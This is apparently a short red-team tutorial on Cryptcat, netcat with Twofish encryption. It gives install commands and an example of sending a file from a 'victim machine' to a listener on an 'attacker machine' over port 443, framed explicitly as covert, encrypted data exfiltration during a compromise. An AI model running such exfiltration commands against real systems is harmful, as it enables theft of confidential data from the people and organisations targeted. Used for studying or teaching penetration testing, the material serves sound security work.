CryptCat

Cryptcat is the standard netcat enhanced with Twofish encryption, with ports for Windows NT, BSD and Linux. Twofish is courtesy of Counterpane and Cryptix.

Cryptcat is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol, while encrypting the data being transmitted. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Secure Transfer

There are several reasons to use Cryptcat. One of them is its Twofish cipher, developed by Counterpane Labs.

As you can imagine, in a red team compromise you may encounter private or confidential data, which can be of much value to a red team (not to mention cybercriminals). When doing data exfiltration, you have to be sure of how you are going to operate, and you have to keep in mind that a third party may be intercepting your connection. A good reference is TunnelShell: when you use it to create a covert channel, the connection is not encrypted at all. If some third party manages to find that connection, they could monitor you and steal your data at the same time you do the exfiltration, which would be devastating. That is why cryptography is used in any kind of connection.

Twofish

Twofish is a symmetric-key block cipher. Its block size is 128 bits and its key size can go up to 256 bits.

It was designed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall and Niels Ferguson.

The distinguishing features of Twofish are its use of precomputed, key-dependent S-boxes and a relatively complex key schedule.

Install

sudo apt-get update
sudo apt-get install cryptcat

CryptCat Usage

Now let’s see how to use Cryptcat. For this example we will simply transfer a file.

Attacker Machine

cryptcat -l -p 443 -n > file

Victim Machine

cryptcat <ip> 443 < file

-l / listen mode, for inbound connects

-p / local port number

-n / numeric-only IP addresses, no DNS